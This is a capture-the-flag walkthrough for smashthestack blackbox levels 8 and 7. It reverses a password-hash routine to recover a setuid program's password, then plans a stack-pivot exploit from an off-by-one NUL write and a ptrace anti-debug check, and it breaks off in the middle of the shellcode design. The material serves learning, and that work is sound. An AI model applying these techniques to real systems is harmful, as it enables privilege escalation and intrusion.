level8@blackbox:/tmp$ ./wrap 0x08048764 10
555b5b5a526357666358564d246c222300506c6561736520656e74657220796f7572207061737377

See the 00 there? I suspect it is a string terminator, let's see what that string is:

level8@blackbox:/tmp$ python -c "print '%r' % '555b5b5a526357666358564d246c\
2223'.decode('hex')"
'U[[ZRcWfcXVM$l"#'

Odd string...seems like gibberish, we'll give ebp-0xc the name gibberish then. Let's continue, it might make more sense later:
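
The one-liner above relies on Python 2's 'hex' codec, which Python 3 no longer has. A Python 3 sketch that also cuts the dump at the first terminator could look like this (the function name is made up):

```python
def c_string(hex_text):
    """Decode a hex dump and return the text up to the first NUL byte."""
    raw = bytes.fromhex(hex_text)
    return raw.split(b"\x00", 1)[0].decode("ascii")


dump = ("555b5b5a526357666358564d246c222300506c65"
        "61736520656e74657220796f7572207061737377")
print(repr(c_string(dump)))  # 'U[[ZRcWfcXVM$l"#'
```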

0804847F  C7042475870408    mov dword [esp],0x8048775
08048486  E8CDFEFFFF        call dword 0x8048358
0804848B  8945F0            mov [ebp-0x10],eax

This is a function call with one parameter, which also looks like an address in the data section:

level8@blackbox:/tmp$ ./wrap 0x08048775 10
506c6561736520656e74657220796f75722070617373776f72643a200057656c636f6d650a002f62

Again, I spot another string terminator, so let's decode the string:

level8@blackbox:/tmp$ python -c "print '%r' % '506c6561736520656e7465722079\
6f75722070617373776f72643a20'.decode('hex')"
'Please enter your password: '

Aha, a prompt. It also looks like the return value is stored in the stack at ebp-0x10. This means that this is not some regular printf or puts.

0804848E  C785E4FBFFFF0000  mov dword [ebp-0x41c],0x0
         -0000

That's some sort of initialization of a variable at ebp-0x41c.

08048498  8B45F0            mov eax,[ebp-0x10]
0804849B  890424            mov [esp],eax
0804849E  E8C5FEFFFF        call dword 0x8048368
080484A3  48                dec eax
080484A4  3985E4FBFFFF      cmp [ebp-0x41c],eax
080484AA  7347              jnc 0x80484f3

This executes a mystery function on whatever was stored in ebp-0x10 (the return from that prompt function), subtracts 1 from the return value and compares the result to the variable at ebp-0x41c. Sort of like this:

if (var_41c >= (func(var_10) - 1)) goto 0x80484f3

Let's call that address label1 from now on, in case we see it again.

080484AC  81BDE4FBFFFFFB03  cmp dword [ebp-0x41c],0x3fb
         -0000
080484B6  7602              jna 0x80484ba
080484B8  EB39              jmp short 0x80484f3

This compares var_41c to the constant 0x3fb, and jumps to some new location if it is lower or equal, or to label1 otherwise. Equivalent C code:

if (var_41c <= 0x3fb) goto 0x80484ba
else goto label1

Let's call the new address label2.
For the next piece of code, notice it starts at label2, I'll just annotate it:

label2:
080484BA  8D85E8FBFFFF      lea eax,[ebp-0x418]
080484C0  89C3              mov ebx,eax
080484C2  039DE4FBFFFF      add ebx,[ebp-0x41c]
080484C8  8B85E4FBFFFF      mov eax,[ebp-0x41c]
080484CE  0345F0            add eax,[ebp-0x10]
080484D1  8D4801            lea ecx,[eax+0x1]
080484D4  8B85E4FBFFFF      mov eax,[ebp-0x41c]
080484DA  0345F0            add eax,[ebp-0x10]
080484DD  0FB610            movzx edx,byte [eax]
080484E0  0FB601            movzx eax,byte [ecx]
080484E3  28D0              sub al,dl
080484E5  045A              add al,0x5a
080484E7  8803              mov [ebx],al
080484E9  8D85E4FBFFFF      lea eax,[ebp-0x41c]
080484EF  FF00              inc dword [eax]
080484F1  EBA5              jmp short 0x8048498

What happens here is this, and you can verify it yourself:

var_418[var_41c] = var_10[var_41c + 1] - var_10[var_41c] + 0x5a;
var_41c++;

This tells us several things:

var_41c is some sort of index, from now on we will call it idx.
var_418 is some temporary buffer in the stack, we'll call it buf.
var_10, which was returned from the prompt function, is a pointer to some input, most probably the user input, and the prompt function is a prompt-and-read function. We will call it input.

At the end of that section, there's a jump to 0x8048498 which we will call label3. We've already been there, it's the piece that contained the mystery function. Let's rewrite it, but with more meaningful names and see if it sheds some new light:

if (idx >= (func(input) - 1)) goto label1
else if (idx <= 0x3fb) goto label2
else goto label1

I think we can spot what's happening here: the mystery function func is actually strlen, and this is part of a while statement:

while ((idx < strlen(input) - 1) && (idx <= 0x3fb)) {
    buf[idx] = input[idx + 1] - input[idx] + 0x5a;
    idx++;
}
/* do label1 stuff */

OK, let's see what happens at label1 (I'm going to start annotating the code with variable names):

label1:
080484F3  8D85E8FBFFFF      lea eax,[buf]
080484F9  89C2              mov edx,eax
080484FB  0395E4FBFFFF      add edx,[idx]
08048501  8B85E4FBFFFF      mov eax,[idx]
08048507  0345F0            add eax,[input]
0804850A  0FB600            movzx eax,byte [eax]
0804850D  C0F804            sar al,0x4
08048510  240F              and al,0xf
08048512  0421              add al,0x21
08048514  8802              mov [edx],al

This translates to:

buf[idx] = 0x21 + ((input[idx] >> 4) & 0xf);

The next chunk:

08048516  8D85E9FBFFFF      lea eax,[buf+1]
0804851C  89C2              mov edx,eax
0804851E  0395E4FBFFFF      add edx,[idx]
08048524  8B85E4FBFFFF      mov eax,[idx]
0804852A  0345F0            add eax,[input]
0804852D  0FB600            movzx eax,byte [eax]
08048530  240F              and al,0xf
08048532  0421              add al,0x21
08048534  8802              mov [edx],al

Which translates to:

buf[idx + 1] = 0x21 + (input[idx] & 0xf);

Next we have:

08048536  8D85EAFBFFFF      lea eax,[buf+2]
0804853C  0385E4FBFFFF      add eax,[idx]
08048542  C60000            mov byte [eax],0x0
08048545  C785E4FBFFFF0000  mov dword [idx],0x0
         -0000

This is equivalent to:

buf[idx + 2] = 0;
idx = 0;

This looks like something string-like was terminated, and the index was reset, probably for a second pass. Let's see what happens next:

0804854F  8D85E8FBFFFF      lea eax,[buf]
08048555  890424            mov [esp],eax
08048558  E80BFEFFFF        call dword 0x8048368 [strlen]
0804855D  48                dec eax
0804855E  3985E4FBFFFF      cmp [idx],eax
08048564  7205              jc 0x804856b [label4]
08048566  E99B000000        jmp dword 0x8048606 [label5]

Translated to C:

if (idx < strlen(buf) - 1) goto label4;
else goto label5;

The next piece of code starts at label4, and has a repeating pattern, so I'll paste it all at once:

label4:
0804856B  8D85E8FBFFFF      lea eax,[buf]
08048571  89C1              mov ecx,eax
08048573  038DE4FBFFFF      add ecx,[idx]
08048579  8D85E8FBFFFF      lea eax,[buf]
0804857F  89C2              mov edx,eax
08048581  0395E4FBFFFF      add edx,[idx]
08048587  8D85E9FBFFFF      lea eax,[buf+1]
0804858D  0385E4FBFFFF      add eax,[idx]
08048593  0FB600            movzx eax,byte [eax]
08048596  3202              xor al,[edx]
08048598  8801              mov [ecx],al
0804859A  8D85E9FBFFFF      lea eax,[buf+1]
080485A0  89C1              mov ecx,eax
080485A2  038DE4FBFFFF      add ecx,[idx]
080485A8  8D85E9FBFFFF      lea eax,[buf+1]
080485AE  89C2              mov edx,eax
080485B0  0395E4FBFFFF      add edx,[idx]
080485B6  8D85E8FBFFFF      lea eax,[buf]
080485BC  0385E4FBFFFF      add eax,[idx]
080485C2  0FB600            movzx eax,byte [eax]
080485C5  3202              xor al,[edx]
080485C7  8801              mov [ecx],al
080485C9  8D85E8FBFFFF      lea eax,[buf]
080485CF  89C1              mov ecx,eax
080485D1  038DE4FBFFFF      add ecx,[idx]
080485D7  8D85E8FBFFFF      lea eax,[buf]
080485DD  89C2              mov edx,eax
080485DF  0395E4FBFFFF      add edx,[idx]
080485E5  8D85E9FBFFFF      lea eax,[buf+1]
080485EB  0385E4FBFFFF      add eax,[idx]
080485F1  0FB600            movzx eax,byte [eax]
080485F4  3202              xor al,[edx]
080485F6  8801              mov [ecx],al

Which is:

buf[idx] = buf[idx] ^ buf[idx + 1];
buf[idx + 1] = buf[idx] ^ buf[idx + 1];
buf[idx] = buf[idx] ^ buf[idx + 1];

That's just the code for swapping bytes.
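
If the XOR trick is new to you, here is the same three-step swap in Python (a toy helper, not part of the level):

```python
def xor_swap(buf, i):
    """Swap buf[i] and buf[i + 1] using three XORs and no temporary."""
    buf[i] ^= buf[i + 1]      # buf[i] now holds a ^ b
    buf[i + 1] ^= buf[i]      # b ^ (a ^ b) = a
    buf[i] ^= buf[i + 1]      # (a ^ b) ^ a = b


data = bytearray(b"AB")
xor_swap(data, 0)
print(data)  # bytearray(b'BA')
```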
Next we have:

080485F8  8D85E4FBFFFF      lea eax,[idx]
080485FE  830002            add dword [eax],byte +0x2
08048601  E949FFFFFF        jmp dword 0x804854f

Which increments the index by 2 and then jumps back to the index comparison, which makes it look like another loop:

for (idx = 0; idx < strlen(buf) - 1; idx += 2) {
    buf[idx] = buf[idx] ^ buf[idx + 1];
    buf[idx + 1] = buf[idx] ^ buf[idx + 1];
    buf[idx] = buf[idx] ^ buf[idx + 1];
}

Next is the code that gets executed when the loop is exhausted:

label5:
08048606  8D95E8FBFFFF      lea edx,[buf]
0804860C  8B45F4            mov eax,[gibberish]
0804860F  89442404          mov [esp+0x4],eax
08048613  891424            mov [esp],edx
08048616  E81DFDFFFF        call dword 0x8048338
0804861B  85C0              test eax,eax
0804861D  751A              jnz 0x8048639

I think by this time you've figured out what's happening here: gibberish is a password hash, what the program has done so far is hash the input password, and this is where the two get compared.
I won't continue analyzing the code anymore, because that's enough. Let's combine all the little pieces of C code and see what we can do:

while ((idx < strlen(input) - 1) && (idx <= 0x3fb)) {
    buf[idx] = input[idx + 1] - input[idx] + 0x5a;
    idx++;
}

buf[idx] = 0x21 + ((input[idx] >> 4) & 0xf);
buf[idx + 1] = 0x21 + (input[idx] & 0xf);
buf[idx + 2] = 0;

for (idx = 0; idx < strlen(buf) - 1; idx += 2) {
    buf[idx] = buf[idx] ^ buf[idx + 1];
    buf[idx + 1] = buf[idx] ^ buf[idx + 1];
    buf[idx] = buf[idx] ^ buf[idx + 1];
}

Well, we know the hash function, and we know the hashed password. We can now invert the hash and obtain the original password.
That should be easy, working backwards:

Unswap every two consecutive bytes in the hash.
Take the last two bytes, subtract 0x21 from them, and recombine them to a single byte, one being the high nibble, and the other the low nibble. Now we know input[N], the last character of the password.
Reversing the formula for buf inside the while we can obtain a regression formula for the input: input[i] = input[i + 1] - buf[i] + 0x5a.

I think I'll leave it to you to write a script and obtain the password yourselves.
I'll check if it works:

level8@blackbox:~$ ./secrets
Please enter your password: 
Welcome
sh-3.1$

Just one last level to go ;)

Blackbox - chapter 7

$ ssh -p 2225 level7@blackbox.smashthestack.org
level7@blackbox.smashthestack.org's password:
...
level7@blackbox:~$ ls -l
total 12
-rwsr-xr-x 1 level8 level8 7851 2008-04-21 18:26 heybabe
-rw-r--r-- 1 root   level7   10 2008-01-24 05:56 passwd

No source, so like the previous time, let's start with dumping the data:

level7@blackbox:~$ objdump -s --section=.rodata heybabe

heybabe:     file format elf32-i386

Contents of section .rodata:
 80486b0 03000000 01000200 75736167 653a2025  ........usage: %
 80486c0 73203c61 72673e0a 00000000 54726163  s <arg>.....Trac
 80486d0 696e6720 64657465 63746564 203a2920  ing detected :) 
 80486e0 736f7272 79202e2e 2e2e2e00 544f5547  sorry ......TOUG
 80486f0 48205348 49542100 57616c6b 20746865  H SHIT!.Walk the
 8048700 20776179 206f6620 74686520 31333337   way of the 1337
 8048710 206f6e65 2100                         one!.

As before, I've picked out the strings and made a summary of their addresses:

80486b8: usage: %s <arg>\n
80486cc: Tracing detected :) sorry .....
80486ec: TOUGH SHIT!
80486f8: Walk the way of the 1337 one!

Now we'll disassemble main:

level7@blackbox:~$ objdump -d heybabe|grep -A80 "<main>:"
08048464 <main>:
 8048464: 8d 4c 24 04           lea    0x4(%esp),%ecx
 8048468: 83 e4 f0              and    $0xfffffff0,%esp
 804846b: ff 71 fc              pushl  0xfffffffc(%ecx)
 804846e: 55                    push   %ebp
 804846f: 89 e5                 mov    %esp,%ebp
 8048471: 57                    push   %edi
 8048472: 51                    push   %ecx
 8048473: 81 ec 10 04 00 00     sub    $0x410,%esp
 8048479: 89 8d 04 fc ff ff     mov    %ecx,0xfffffc04(%ebp)
 804847f: 8b 85 04 fc ff ff     mov    0xfffffc04(%ebp),%eax
 8048485: 83 38 02              cmpl   $0x2,(%eax)
 8048488: 74 27                 je     80484b1 <main+0x4d>
 804848a: 8b 95 04 fc ff ff     mov    0xfffffc04(%ebp),%edx
 8048490: 8b 42 04              mov    0x4(%edx),%eax
 8048493: 8b 00                 mov    (%eax),%eax
 8048495: 89 44 24 04           mov    %eax,0x4(%esp)
 8048499: c7 04 24 b8 86 04 08  movl   $0x80486b8,(%esp)
 80484a0: e8 cf fe ff ff        call   8048374 <printf@plt>
 80484a5: c7 04 24 ff ff ff ff  movl   $0xffffffff,(%esp)
 80484ac: e8 d3 fe ff ff        call   8048384 <exit@plt>
 80484b1: c7 44 24 0c 00 00 00  movl   $0x0,0xc(%esp)
 80484b8: 00 
 80484b9: c7 44 24 08 01 00 00  movl   $0x1,0x8(%esp)
 80484c0: 00 
 80484c1: c7 44 24 04 00 00 00  movl   $0x0,0x4(%esp)
 80484c8: 00 
 80484c9: c7 04 24 00 00 00 00  movl   $0x0,(%esp)
 80484d0: e8 7f fe ff ff        call   8048354 <ptrace@plt>
 80484d5: 85 c0                 test   %eax,%eax
 80484d7: 79 18                 jns    80484f1 <main+0x8d>
 80484d9: c7 04 24 cc 86 04 08  movl   $0x80486cc,(%esp)
 80484e0: e8 5f fe ff ff        call   8048344 <puts@plt>
 80484e5: c7 04 24 ff ff ff ff  movl   $0xffffffff,(%esp)
 80484ec: e8 93 fe ff ff        call   8048384 <exit@plt>
 80484f1: 8b bd 04 fc ff ff     mov    0xfffffc04(%ebp),%edi
 80484f7: 8b 47 04              mov    0x4(%edi),%eax
 80484fa: 83 c0 04              add    $0x4,%eax
 80484fd: 8b 00                 mov    (%eax),%eax
 80484ff: c7 44 24 08 e7 03 00  movl   $0x3e7,0x8(%esp)
 8048506: 00 
 8048507: 89 44 24 04           mov    %eax,0x4(%esp)
 804850b: 8d 85 10 fc ff ff     lea    0xfffffc10(%ebp),%eax
 8048511: 89 04 24              mov    %eax,(%esp)
 8048514: e8 7b fe ff ff        call   8048394 <strncpy@plt>
 8048519: 8d 85 10 fc ff ff     lea    0xfffffc10(%ebp),%eax
 804851f: b9 ff ff ff ff        mov    $0xffffffff,%ecx
 8048524: 89 85 00 fc ff ff     mov    %eax,0xfffffc00(%ebp)
 804852a: b0 00                 mov    $0x0,%al
 804852c: fc                    cld    
 804852d: 8b bd 00 fc ff ff     mov    0xfffffc00(%ebp),%edi
 8048533: f2 ae                 repnz scas %es:(%edi),%al
 8048535: 89 c8                 mov    %ecx,%eax
 8048537: f7 d0                 not    %eax
 8048539: 48                    dec    %eax
 804853a: 40                    inc    %eax
 804853b: c6 84 05 10 fc ff ff  movb   $0x0,0xfffffc10(%ebp,%eax,1)
 8048542: 00 
 8048543: c7 44 24 04 24 00 00  movl   $0x24,0x4(%esp)
 804854a: 00 
 804854b: 8d 85 10 fc ff ff     lea    0xfffffc10(%ebp),%eax
 8048551: 89 04 24              mov    %eax,(%esp)
 8048554: e8 db fd ff ff        call   8048334 <strchr@plt>
 8048559: 85 c0                 test   %eax,%eax
 804855b: 74 18                 je     8048575 <main+0x111>
 804855d: c7 04 24 ec 86 04 08  movl   $0x80486ec,(%esp)
 8048564: e8 0b fe ff ff        call   8048374 <printf@plt>
 8048569: c7 04 24 ff ff ff ff  movl   $0xffffffff,(%esp)
 8048570: e8 0f fe ff ff        call   8048384 <exit@plt>
 8048575: c7 04 24 f8 86 04 08  movl   $0x80486f8,(%esp)
 804857c: e8 f3 fd ff ff        call   8048374 <printf@plt>
 8048581: 8d 85 10 fc ff ff     lea    0xfffffc10(%ebp),%eax
 8048587: 89 04 24              mov    %eax,(%esp)
 804858a: e8 e5 fd ff ff        call   8048374 <printf@plt>
 804858f: b8 00 00 00 00        mov    $0x0,%eax
 8048594: 81 c4 10 04 00 00     add    $0x410,%esp
 804859a: 59                    pop    %ecx
 804859b: 5f                    pop    %edi
 804859c: 5d                    pop    %ebp
 804859d: 8d 61 fc              lea    0xfffffffc(%ecx),%esp
 80485a0: c3                    ret

The first few lines, up to the cmpl & je, should be familiar (if not, see the previous chapter for a detailed description). They tell us two things: first, that the pointer to the arguments (ecx) is stored at ebp-0x3fc, and second, that the program expects exactly one argument.
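
If the 0xfffffc04(%ebp) notation looks odd: this old objdump prints negative displacements as unsigned 32-bit numbers. A tiny sketch (the helper names are mine) that converts them into the ebp-0x... form I use in the text:

```python
def signed32(value):
    """Interpret a 32-bit unsigned number as a two's complement signed one."""
    value &= 0xFFFFFFFF
    return value - 0x100000000 if value & 0x80000000 else value


def describe(displacement, base="ebp"):
    """Render a displacement such as 0xfffffc04 as 'ebp-0x3fc'."""
    offset = signed32(displacement)
    sign = "-" if offset < 0 else "+"
    return "%s%s0x%x" % (base, sign, abs(offset))


if __name__ == "__main__":
    for disp in (0xfffffc04, 0xfffffc10, 0xfffffc00):
        print(hex(disp), "->", describe(disp))
```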

The next lines are somewhat more tricky and important to this level:

 80484b1: c7 44 24 0c 00 00 00  movl   $0x0,0xc(%esp)
 80484b8: 00 
 80484b9: c7 44 24 08 01 00 00  movl   $0x1,0x8(%esp)
 80484c0: 00 
 80484c1: c7 44 24 04 00 00 00  movl   $0x0,0x4(%esp)
 80484c8: 00 
 80484c9: c7 04 24 00 00 00 00  movl   $0x0,(%esp)
 80484d0: e8 7f fe ff ff        call   8048354 <ptrace@plt>
 80484d5: 85 c0                 test   %eax,%eax
 80484d7: 79 18                 jns    80484f1 <main+0x8d>

The called function is ptrace, and it is called with the following parameters: ptrace(0, 0, 1, 0). Then the sign of the return value is tested (test followed by jns), and the jump is taken only if the value is non-negative.
Now, what is this ptrace, what are its arguments, and why is it crucial for this level?
Well, ptrace is a system call, and we can find some documentation about it in the man pages (cropped for brevity and relevance, you can find the full man-pages by invoking man ptrace):

PTRACE(2)                 Linux Programmer's Manual                 PTRACE(2)

NAME
       ptrace - process trace

SYNOPSIS
       #include <sys/ptrace.h>

       long ptrace(enum __ptrace_request request, pid_t pid,
                   void *addr, void *data);

DESCRIPTION
       The  ptrace()  system  call provides a means by which a parent process
       may observe and control the execution of another process, and  examine
       and  change  its  core  image  and registers.  It is primarily used to
       implement breakpoint debugging and system call tracing.

       The parent can initiate a trace by  calling  fork(2)  and  having  the
       resulting  child  do  a  PTRACE_TRACEME,  followed  (typically)  by an
       exec(3).  Alternatively, the parent may commence trace of an  existing
       process using PTRACE_ATTACH.  (See additional notes below.)
...
       The value of request determines the action to be performed:

       PTRACE_TRACEME
              Indicates that this process is to be traced by its parent.  Any
              signal (except SIGKILL) delivered to this process will cause it
              to  stop  and its parent to be notified via wait(2).  Also, all
              subsequent calls to execve(2) by this process will cause a SIG‐
              TRAP  to be sent to it, giving the parent a chance to gain con‐
              trol before the new program begins execution.  A process proba‐
              bly  shouldn't  make this request if its parent isn't expecting
              to trace it.  (pid, addr, and data are ignored.)

       The above request is used only by the child process; the rest are used
       only  by  the  parent.   In  the following requests, pid specifies the
       child process to be acted on.  For requests  other  than  PTRACE_KILL,
       the child process must be stopped.
...
RETURN VALUE
       On  success,  PTRACE_PEEK*  requests  return the requested data, while
       other requests return zero.  On error, all  requests  return  -1,  and
       errno  is set appropriately.  Since the value returned by a successful
       PTRACE_PEEK* request may be -1, the caller must check errno after such
       requests to determine whether or not an error occurred.
...

OK, what can we learn from the man pages:

The ptrace system-call receives 4 parameters: a request code, a pid, an address pointer and a data pointer.
The request code used in our case is 0, which corresponds to PTRACE_TRACEME. What this request does is make the process behave in a traceable fashion, which involves, among other things, making it stop before any call to execve. Also, all the rest of the arguments are ignored.
The function returns -1 on failure.
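
To see how the test %eax,%eax / jns pair reacts to those return values, here is a small model of it. This is only a sketch of the flag logic with names I made up, not anything taken from the binary:

```python
def sign_flag(eax):
    """SF after `test %eax,%eax` is simply bit 31 of eax."""
    return ((eax & 0xFFFFFFFF) >> 31) & 1


def jns_taken(eax):
    """jns jumps when the sign flag is clear, i.e. eax is non-negative."""
    return sign_flag(eax) == 0


if __name__ == "__main__":
    print("ptrace returned 0  -> jump taken:", jns_taken(0))
    print("ptrace returned -1 -> jump taken:", jns_taken(-1))
```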

So, in our case, if ptrace fails, it will return -1, which sets the sign flag, which means that the jns branch will not be taken and we go to:

 80484d9: c7 04 24 cc 86 04 08  movl   $0x80486cc,(%esp)
 80484e0: e8 5f fe ff ff        call   8048344 <puts@plt>
 80484e5: c7 04 24 ff ff ff ff  movl   $0xffffffff,(%esp)
 80484ec: e8 93 fe ff ff        call   8048384 <exit@plt>

That's just an error print and an exit.
When will it fail? If the process is already marked as being traced, which is exactly what happens when we try to debug the program by running it in gdb. This can be averted by setting a breakpoint on the test instruction and changing the value of eax so that the check passes. This is not important for this level, but it's good to know.
The really important thing is that, since the process is now in trace mode, we can't execute a shellcode that has an execve system call in it.
Bear that in mind as we continue to analyze the program.

 80484f1: 8b bd 04 fc ff ff     mov    0xfffffc04(%ebp),%edi
 80484f7: 8b 47 04              mov    0x4(%edi),%eax
 80484fa: 83 c0 04              add    $0x4,%eax
 80484fd: 8b 00                 mov    (%eax),%eax

This just loads eax with the address of argv[1] (again, should be familiar from the previous chapter).

 80484ff: c7 44 24 08 e7 03 00  movl   $0x3e7,0x8(%esp)
 8048506: 00 
 8048507: 89 44 24 04           mov    %eax,0x4(%esp)
 804850b: 8d 85 10 fc ff ff     lea    0xfffffc10(%ebp),%eax
 8048511: 89 04 24              mov    %eax,(%esp)
 8048514: e8 7b fe ff ff        call   8048394 <strncpy@plt>

Now, this is a call to a safe strncpy with the destination being ebp-0x3f0, which we will call from now on buf, the source being argv[1] and the maximum size limit being 0x3e7.
The next piece of code is a bit tricky:

 8048519: 8d 85 10 fc ff ff     lea    0xfffffc10(%ebp),%eax
 804851f: b9 ff ff ff ff        mov    $0xffffffff,%ecx
 8048524: 89 85 00 fc ff ff     mov    %eax,0xfffffc00(%ebp)
 804852a: b0 00                 mov    $0x0,%al
 804852c: fc                    cld    
 804852d: 8b bd 00 fc ff ff     mov    0xfffffc00(%ebp),%edi
 8048533: f2 ae                 repnz scas %es:(%edi),%al
 8048535: 89 c8                 mov    %ecx,%eax
 8048537: f7 d0                 not    %eax
 8048539: 48                    dec    %eax

This is basically an inline implementation of strlen with buf as the argument. For a more in depth explanation of how this works you can check out this article. Bottom line, eax now contains the length of buf, which is the number of bytes until the first string terminator.
However, and this is important, there is an interesting point about strncpy, and that is that if the source string is longer than the limit, it will not terminate the string at the destination. This means that buf will not necessarily have a string terminator inside it, and then strlen will keep searching up the rest of the stack for a 0x00.
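
Here is a rough Python model of both points, assuming a toy 8-byte buffer followed by a stored 0xbfff0100 instead of the real frame. The function names and the 0xAA "garbage" fill are my own assumptions for illustration:

```python
def strncpy_model(dest, src, n):
    """Like strncpy: copy at most n bytes, pad with NULs only if src is shorter."""
    data = src[:n]
    dest[:n] = data + b"\x00" * (n - len(data))


def scasb_strlen(memory, start):
    """Model of mov $-1,%ecx; repnz scasb; not; dec as used in main."""
    ecx = 0xFFFFFFFF
    edi = start
    while ecx != 0:
        byte = memory[edi]
        edi += 1
        ecx = (ecx - 1) & 0xFFFFFFFF
        if byte == 0:                   # al is 0, so ZF is set on a NUL byte
            break
    eax = (~ecx) & 0xFFFFFFFF           # not %eax
    return (eax - 1) & 0xFFFFFFFF       # dec %eax


if __name__ == "__main__":
    # 8 bytes of non-zero "garbage" standing in for buf, then 00 01 ff bf
    memory = bytearray(b"\xaa" * 8 + bytes.fromhex("0001ffbf"))
    strncpy_model(memory, b"B" * 20, 7)  # source longer than the limit
    print(scasb_strlen(memory, 0))       # runs past the 8-byte buffer
```

With a short source the copy is padded with NULs and the length comes out as expected; with a long one the scan only stops at the first zero byte that happens to follow the buffer.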

 804853a: 40                    inc    %eax
 804853b: c6 84 05 10 fc ff ff  movb   $0x0,0xfffffc10(%ebp,%eax,1)
 8048542: 00

This puts a new string terminator at buf[strlen(buf) + 1], i.e. one byte past the terminator that strlen has just found.

 8048543: c7 44 24 04 24 00 00  movl   $0x24,0x4(%esp)
 804854a: 00 
 804854b: 8d 85 10 fc ff ff     lea    0xfffffc10(%ebp),%eax
 8048551: 89 04 24              mov    %eax,(%esp)
 8048554: e8 db fd ff ff        call   8048334 <strchr@plt>
 8048559: 85 c0                 test   %eax,%eax
 804855b: 74 18                 je     8048575 <main+0x111>

This performs a search on buf for the character '$'=0x24 using strchr, which if successful, returns some non-0 pointer to the character, or NULL on failure.
If the search is successful, i.e. we have a '$' in our buffer, we are sent to:

 804855d: c7 04 24 ec 86 04 08  movl   $0x80486ec,(%esp)
 8048564: e8 0b fe ff ff        call   8048374 <printf@plt>
 8048569: c7 04 24 ff ff ff ff  movl   $0xffffffff,(%esp)
 8048570: e8 0f fe ff ff        call   8048384 <exit@plt>

This prints a message and exits. This is important since this path does not lead to a return from main.
If we do not have a '$' in buf, we go to:

 8048575: c7 04 24 f8 86 04 08  movl   $0x80486f8,(%esp)
 804857c: e8 f3 fd ff ff        call   8048374 <printf@plt>
 8048581: 8d 85 10 fc ff ff     lea    0xfffffc10(%ebp),%eax
 8048587: 89 04 24              mov    %eax,(%esp)
 804858a: e8 e5 fd ff ff        call   8048374 <printf@plt>
 804858f: b8 00 00 00 00        mov    $0x0,%eax
 8048594: 81 c4 10 04 00 00     add    $0x410,%esp
 804859a: 59                    pop    %ecx
 804859b: 5f                    pop    %edi
 804859c: 5d                    pop    %ebp
 804859d: 8d 61 fc              lea    0xfffffffc(%ecx),%esp
 80485a0: c3                    ret

Which contains a return from main.
Now, here I'd like to discuss the last few lines of code in detail. The thing is, that when ret is executed, it pops whatever esp points to, and jumps there.
Notice that before the return, esp is loaded with ecx-4, while ecx is popped from the stack.
Before we continue, I just want to sketch the stack:

Now suppose this scenario:

We supply a very long, yet to be determined, argument to the program.
The important thing is that we want ecx to be 0xbfff0100.
This will make strlen stop when it reaches the LSB of the stored ecx, which means that a new 0x00 byte will be written on the second byte of the stored ecx, resulting in 0xbfff0000, which is an address 256 bytes lower than the original ecx.
That address is actually an address inside buf.
At the end of main, that address minus 4 will be loaded into esp, so we need to make sure that this location contains the address of the bottom of buf.
The bottom of buf itself will contain a shellcode.
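
The byte-level effect of that scenario can be sketched like this. I'm assuming that buf is 0x3e8 bytes long (ebp-0x3f0 up to ebp-0x9), that every byte of it ends up non-zero, and that the stored ecx sits right after it at ebp-8. The function name is made up:

```python
import struct

BUF_SIZE = 0x3e8  # assumption: buf spans ebp-0x3f0 .. ebp-0x9


def tampered_ecx(saved_ecx):
    """Apply the inline strlen and the off-by-one NUL write to a full buf.

    Only models the case where the stored ecx contains a zero byte;
    otherwise bytearray.index raises ValueError.
    """
    frame = bytearray(b"X" * BUF_SIZE) + bytearray(struct.pack("<I", saved_ecx))
    length = frame.index(0)      # strlen stops at the first 0x00 it meets
    frame[length + 1] = 0        # inc %eax ; movb $0x0, buf(%eax)
    return struct.unpack_from("<I", frame, BUF_SIZE)[0]


if __name__ == "__main__":
    before = 0xbfff0100
    after = tampered_ecx(before)
    print(hex(before), "->", hex(after), "difference", hex(before - after))
```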

So, let's analyze how ecx might be affected. First, let's see what its value is without any arguments:

level7@blackbox:~$ gdb heybabe
GNU gdb 6.4.90-debian
...
(gdb) b main
Breakpoint 1 at 0x8048473
(gdb) run
Starting program: /home/level7/heybabe 

Breakpoint 1, 0x08048473 in main ()
(gdb) x/a $ebp-8
0xbfffda80:	0xbfffdaa0

We would like that to be 0xbfff0100. So let's try with an argument 0xbfffdaa0-0xbfff0100=0xd9a0 bytes long:

(gdb) run `python -c "print 'a'*0xd9a0"`
The program being debugged has been started already.
Start it from the beginning? (y or n) y
Starting program: /home/level7/heybabe `python -c "print 'a'*0xd9a0"`

Breakpoint 1, 0x08048473 in main ()
(gdb) x/a $ebp-8
0xbfff00e0:	0xbfff0100

Good. You can also see that ebp-8=0xbfff00e0 so ebp=0xbfff00e8.
This means that the tampered ecx will point to ebp-0xe8. So, 4 bytes below that, at ebp-0xec, we should place the address of buf, which is ebp-0x3f0=0xbffefcf8.
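
The arithmetic is easy to get wrong, so here is a short sketch that recomputes it from the two gdb readings above. The function and key names are mine:

```python
def frame_layout(ebp, saved_ecx):
    """Derive the interesting addresses from ebp and the stored ecx."""
    tampered_ecx = saved_ecx & 0xFFFF00FF   # second byte overwritten with 0x00
    ret_slot = tampered_ecx - 4             # lea -4(%ecx),%esp ; ret pops from here
    buf = ebp - 0x3f0
    return {
        "tampered_ecx": tampered_ecx,
        "ret_slot": ret_slot,
        "buf": buf,
        "ret_slot_offset_in_buf": ret_slot - buf,
    }


# Argument length that moved the stored ecx from 0xbfffdaa0 to 0xbfff0100
ARG_LENGTH = 0xbfffdaa0 - 0xbfff0100

if __name__ == "__main__":
    print("argument length          0x%x" % ARG_LENGTH)
    for name, value in frame_layout(0xbfff00e8, 0xbfff0100).items():
        print("%-24s 0x%x" % (name, value))
```

The last value is the offset inside buf at which the address of buf has to be written.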

Now that we have the structure of the payload figured out, we need to figure out the payload.

Remember that the call to ptrace with PTRACE_TRACEME will make the process stop before any call to execve.
How can we circumvent that? Well, the ptrace is active only on the process that called it, so if we were to fork, the child process will not be traced, and can do whatever it wants without any limitations.
So what the shellcode needs to do is fork, the child should call execve, and the parent should wait for the child (this way we can interact with the shell and not cause it to just run in the background).
We want our shellcode to be the equivalent of the following C code:

pid = fork();
if (pid == 0) {
    execve(...);
} else {
    wait(NULL);
}

We have already worked out the code for the execve in the second chapter. Let's figure out the other two.
Instead of disassembling fork, I'll disassemble vfork, because fork under libc does not use the fork system call, but rather clone (look in notes of the fork man pages).

(gdb) disas vfork
Dump of assembler code for function vfork:
0x00c6f950 <vfork+0>:	pop    %ecx
0x00c6f951 <vfork+1>:	mov    %gs:0x4c,%edx
0x00c6f958 <vfork+8>:	mov    %edx,%eax
0x00c6f95a <vfork+10>:	neg    %eax
0x00c6f95c <vfork+12>:	jne    0xc6f963 <vfork+19>
0x00c6f95e <vfork+14>:	mov    $0x80000000,%eax
